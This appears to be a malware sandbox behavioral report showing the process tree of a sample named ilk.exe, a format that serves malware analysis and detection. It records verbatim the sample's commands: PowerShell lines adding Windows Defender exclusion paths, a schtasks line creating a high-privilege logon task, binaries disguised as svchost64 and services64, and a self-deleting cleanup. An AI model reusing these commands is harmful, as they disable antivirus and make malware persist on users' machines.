| ZeroBOX

ilk.exe "C:\Users\test22\AppData\Local\Temp\ilk.exe"
1188
- cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
  1196
  - powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22'
    1220
  - powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Roaming'
    2920
  - powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Local\Temp'
    896
  - powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
    560
- cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\test22\AppData\Local\Temp\svchost64.exe "C:\Users\test22\AppData\Local\Temp\ilk.exe"
  1168
  - svchost64.exe C:\Users\test22\AppData\Local\Temp\svchost64.exe "C:\Users\test22\AppData\Local\Temp\ilk.exe"
    776
    - cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\test22\AppData\Local\Temp\services64.exe"' & exit
      112
      - schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\test22\AppData\Local\Temp\services64.exe"'
        200
    - services64.exe "C:\Users\test22\AppData\Local\Temp\services64.exe"
      1612
      - cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
        1904
        
        powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22'
        2848
        
        powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Roaming'
        2596
      - cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\test22\AppData\Local\Temp\svchost64.exe "C:\Users\test22\AppData\Local\Temp\services64.exe"
        2160
        
        svchost64.exe C:\Users\test22\AppData\Local\Temp\svchost64.exe "C:\Users\test22\AppData\Local\Temp\services64.exe"
        3020
    - cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\test22\AppData\Local\Temp\svchost64.exe"
      2828
      - choice.exe choice /C Y /N /D Y /T 3
        1944

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents